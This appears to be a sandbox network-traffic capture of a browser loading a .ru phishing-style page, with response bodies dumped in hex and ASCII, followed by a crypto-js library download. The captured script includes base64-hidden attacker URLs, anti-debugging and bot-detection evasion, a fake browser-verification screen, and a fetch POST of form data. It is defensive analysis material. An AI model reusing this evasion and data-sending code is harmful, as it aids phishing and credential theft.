                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6Ikl3aHpaTmtlTy84RUVMbHNHNy9ITmc9PSIsInZhbHVlIjoiSDVKSHNoWTJ6TGtBNi9QMlVuYnJNVXQyNkVTNmVkUnlKcDR6VmxmS0NPVkE3RE55UzNsYk4wS1NHTHJHTWhRcXlBZ1ZINEJvUTZRYUFmRHdoaHAvWkV2MWRCUGNXS2taMFVMT2tqeHhQT0RwUlpmMXFQSTRqcDBFQmNia2VmT3UiLCJtYWMiOiI4MTljN2ViYWE3Yzc3YWFmNGRmMDA4NWY5MzFjMjJmNDNkNjJkM2M1ZmNiMmQzNTk1Zjc5NzY3NTZmNDIwMjBmIiwidGFnIjoiIn0%3D; expires=Sun, 22-Dec-2024 01:46:39 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                            2024-12-21 23:46:39 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 34 30 55 32 45 79 63 46 4a 52 65 46 52 49 62 55 46 58 51 33 51 72 4b 31 64 6f 57 47 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 63 79 74 6a 61 46 6c 78 52 31 4a 53 51 30 6c 32 52 30 78 35 64 57 74 71 53 7a 64 52 62 48 52 34 54 43 38 31 61 33 56 53 62 57 6c 59 59 56 52 51 63 6b 56 49 55 55 56 74 4f 57 6c 59 63 57 31 4a 51 57 31 31 64 46 4a 6b 57 53 74 4e 4e 6e 64 74 64 6c 4e 6c 55 6d 56 45 61 6d 31 51 4e 6c 45 31 4d 6c 68 36 62 7a 6b 32 55 6a 45 33 65 6b 52 55 65 6c 64 4b 54 54 68 46 59 69 39 4f 53 30 35 69 62 32 4a 7a 57 6d 4d 34 4b 7a 41 33 4d 32 31 77 55 57 5a 43 63 47 68 51 4d 30 67 78 63 53 38 76 55 44 64 30 54 47 74 43 56 58 6f
                                                                                                            Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ik40U2EycFJReFRIbUFXQ3QrK1doWGc9PSIsInZhbHVlIjoicytjaFlxR1JSQ0l2R0x5dWtqSzdRbHR4TC81a3VSbWlYYVRQckVIUUVtOWlYcW1JQW11dFJkWStNNndtdlNlUmVEam1QNlE1Mlh6bzk2UjE3ekRUeldKTThFYi9OS05ib2JzWmM4KzA3M21wUWZCcGhQM0gxcS8vUDd0TGtCVXo
                                                                                                            2024-12-21 23:46:39 UTC1369INData Raw: 34 65 37 31 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 68 6f 77 20 68 69 67 68 20 79 6f 75 20 68 61 76 65 20 63 6c 69 6d 62 65 64 2c 20 62 75 74 20 68 6f 77 20 79 6f 75 20 6d 61 6b 65 20 61 20 70 6f 73 69 74 69 76 65 20 64 69 66 66 65 72 65 6e 63 65 20 74 6f 20 74 68 65 20 77 6f 72 6c 64 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 54 68 65 20 73 65 63 72 65 74 20 6f 66 20 73 75 63 63 65 73 73 20 69 73 20 74 6f 20 64 6f 20 74 68 65 20 63 6f 6d 6d 6f 6e 20 74 68 69 6e 67 20 75 6e 63 6f 6d 6d 6f 6e 6c 79 20 77 65 6c 6c 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 55 46 58 4c 6d 70 78 64 57 64 69 59 33 52 6a 5a 48 4d 75 63 6e 55 76 4d 48 42 6f 4d 53 38 3d 22 29 20 3d 3d 20 22
                                                                                                            Data Ascii: 4e71... Success is not how high you have climbed, but how you make a positive difference to the world. --><script>/* The secret of success is to do the common thing uncommonly well. */if(atob("aHR0cHM6Ly9jbUFXLmpxdWdiY3RjZHMucnUvMHBoMS8=") == "
                                                                                                            2024-12-21 23:46:39 UTC1369INData Raw: 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 51 55 68 79 55 6e 6c 6a 62 47 68 57 65 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 46 49 63 6c 4a 35 59 32 78 6f 56 6e 67 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 4d 34 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57
                                                                                                            Data Ascii: gaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojQUhyUnljbGhWeCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI0FIclJ5Y2xoVnguY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTM4cHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW
                                                                                                            2024-12-21 23:46:39 UTC1369INData Raw: 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41
                                                                                                            Data Ascii: aXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA
                                                                                                            2024-12-21 23:46:39 UTC1369INData Raw: 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 36 56 48 68 52 55 47 31 59 64 56 52 79 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 7a 61 30 35 69 5a 6c 42 79 59 31 46 58 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 7a 61 30 35 69 5a 6c 42 79 59 31 46 58 49 43 30 67 65 6c 52 34 55 56 42 74 57 48 56 55 63 69 41 2b 49 47 68 61 5a 45 56 47 61 32 78 54 59 57 6f 67 4a 69 59 67 49 57 5a 4a 59 58 4a 6c 53 33 56 71 61 56 41 70
                                                                                                            Data Ascii: GZ1bmN0aW9uKCkgew0KICAgICAgICBjb25zdCB6VHhRUG1YdVRyID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCBza05iZlByY1FXID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChza05iZlByY1FXIC0gelR4UVBtWHVUciA+IGhaZEVGa2xTYWogJiYgIWZJYXJlS3VqaVAp
                                                                                                            2024-12-21 23:46:39 UTC1369INData Raw: 4a 69 62 48 52 6b 64 57 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 31 59 53 49 67 64 6d 46 73 64 57 55 39 49 6c 56 75 61 32 35 76 64 32 34 69 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 63 55 31 47 57 6b 78 57 56 46 6c 4d 53 69 49 2b 44 51 70 57 5a 58 4a 70 5a 6e 6c 70 62 6d 63 67 65 57 39 31 63 69 42 69 63 6d 39 33 63 32 56 79 49 47 5a 76 63 69 42 68 49
                                                                                                            Data Ascii: JibHRkdWEiIG5hbWU9ImJsdGR1YSIgdmFsdWU9IlVua25vd24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIiBpZD0icU1GWkxWVFlMSiI+DQpWZXJpZnlpbmcgeW91ciBicm93c2VyIGZvciBhI
                                                                                                            2024-12-21 23:46:39 UTC1369INData Raw: 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 47 6c 6d 4b 48 52 6c 65 48 51 67 50 54 30 67 4d 43 6c 37 44 51 6f 67 49 43 41 67 5a 6d 56 30 59 32 67 6f 62 45 78 43 56 30 35 71 52 47 4e 30 56 69 77 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 74 5a 58 52 6f 62 32 51 36 49 43 4a 51 54 31 4e 55 49 69 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 59 6d 39 6b 65 54 6f 67 62 6d 56 33 49 45 5a 76 63 6d 31 45 59 58 52 68 4b 47 39 50 64 33 46 43 65 6b 68 50 57 47 59 70 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 79 5a 58 4e 77 62 32 35 7a 5a 53 35 71 63 32 39 75 4b 43 6b 37 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 6b 59 58
                                                                                                            Data Ascii: gPT4gew0KICAgIGlmKHRleHQgPT0gMCl7DQogICAgZmV0Y2gobExCV05qRGN0Viwgew0KICAgICAgICBtZXRob2Q6ICJQT1NUIiwNCiAgICAgICAgYm9keTogbmV3IEZvcm1EYXRhKG9Pd3FCekhPWGYpDQogICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgICAgIHJldHVybiByZXNwb25zZS5qc29uKCk7DQogICAgfSkudGhlbihkYX
                                                                                                            2024-12-21 23:46:39 UTC1369INData Raw: 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 63 6f 6e 73 74 20 49 52 51 51 78 70 41 50 71 4c 20 3d 20 6e 65 77 20 55 52 4c 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 55 46 58 4c 6d 70 78 64 57 64 69 59 33 52 6a 5a 48 4d 75 63 6e 55 76 4d 48 42 6f 4d 53 38 3d 22 29 29 3b 0d 0a 63 6f 6e 73 74 20 41 51 55 64 64 70 68 65 55 59 20 3d 20 49 52 51 51 78 70 41 50 71 4c 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 4a 59 69 49 6c 58 64 78 78 79 20 3f 20 49 52 51 51 78 70 41 50 71 4c 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 49 52 51 51 78 70 41 50 71 4c 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 0d 0a 69 66 28 41 51 55 64 64 70 68 65 55 59 20 3d 3d 20 4a 59 69
                                                                                                            Data Ascii: ce(-2).join('.');const IRQQxpAPqL = new URL(atob("aHR0cHM6Ly9jbUFXLmpxdWdiY3RjZHMucnUvMHBoMS8="));const AQUddpheUY = IRQQxpAPqL.hostname === JYiIlXdxxy ? IRQQxpAPqL.hostname : IRQQxpAPqL.hostname.split('.').slice(-2).join('.');if(AQUddpheUY == JYi
                                                                                                            2024-12-21 23:46:39 UTC1369INData Raw: 4d 54 41 77 4a 54 73 4e 43 69 41 67 62 33 5a 6c 63 6d 5a 73 62 33 63 36 49 47 68 70 5a 47 52 6c 62 6a 73 4e 43 6e 30 4e 43 69 4e 42 53 48 4a 53 65 57 4e 73 61 46 5a 34 49 47 67 30 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 30 46 49 63 6c 4a 35 59 32 78 6f 56 6e 67 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 30 46 49 63 6c 4a 35 59 32 78 6f 56 6e 67
                                                                                                            Data Ascii: MTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNBSHJSeWNsaFZ4IGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI0FIclJ5Y2xoVnggaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI0FIclJ5Y2xoVng
                                                                                                            2024-12-21 23:46:39 UTC1369INData Raw: 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 44 34 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 62 6d 46 32 61 57 64 68 64 47 39 79 4c 6e 64 6c 59 6d 52 79 61 58 5a 6c 63 69 42 38 66 43 42 33 61 57 35 6b 62 33 63 75 59 32 46 73 62 46 42 6f 59 57 35 30 62 32 30 67 66 48 77 67 64 32 6c 75 5a 47 39 33 4c 6c 39 77 61 47 46 75 64 47 39 74 49 48 78 38 49 47 35 68 64 6d 6c 6e 59 58 52 76 63 69 35 31 63 32 56 79 51 57 64 6c 62 6e 51 75 61 57 35 6a 62 48 56 6b 5a 58 4d 6f 49 6b 4a 31 63 6e 41 69 4b 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d
                                                                                                            Data Ascii: QogICAgPHNjcmlwdD4NCiAgICBpZiAobmF2aWdhdG9yLndlYmRyaXZlciB8fCB3aW5kb3cuY2FsbFBoYW50b20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRM


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.449750104.17.24.144435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:41 UTC651OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                            Host: cdnjs.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                            Sec-Fetch-Dest: script
                                                                                                            Referer: https://tf6.jqugbctcds.ru/
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:41 UTC960INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:41 GMT
                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Cache-Control: public, max-age=30672000
                                                                                                            ETag: W/"61182885-40eb"
                                                                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                            cf-cdnjs-via: cfworker/kv
                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                            Timing-Allow-Origin: *
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 280656
                                                                                                            Expires: Thu, 11 Dec 2025 23:46:41 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p8FBZOzhkw%2FFK6TWsW7mImDJNGSsUo9L0N03tLffyxc7QZqVqWNCCxIXIKbTF72Sst4DgCSTs4fdpXS%2FZEqfEfrX14hpYPzpJE58DTY%2FlnzFyvzfkz%2BSmwTt3CBBIUaZf5bYCO68"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                            Strict-Transport-Security: max-age=15780000
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc0c12aa843da-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:41 UTC409INData Raw: 33 39 37 37 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                            Data Ascii: 3977!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                            2024-12-21 23:46:41 UTC1369INData Raw: 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72
                                                                                                            Data Ascii: of globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cr
                                                                                                            2024-12-21 23:46:41 UTC1369INData Raw: 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65
                                                                                                            Data Ascii: .call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomByte
                                                                                                            2024-12-21 23:46:41 UTC1369INData Raw: 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c
                                                                                                            Data Ascii: ypeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<
                                                                                                            2024-12-21 23:46:41 UTC1369INData Raw: 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e
                                                                                                            Data Ascii: (var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>
                                                                                                            2024-12-21 23:46:41 UTC1369INData Raw: 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b
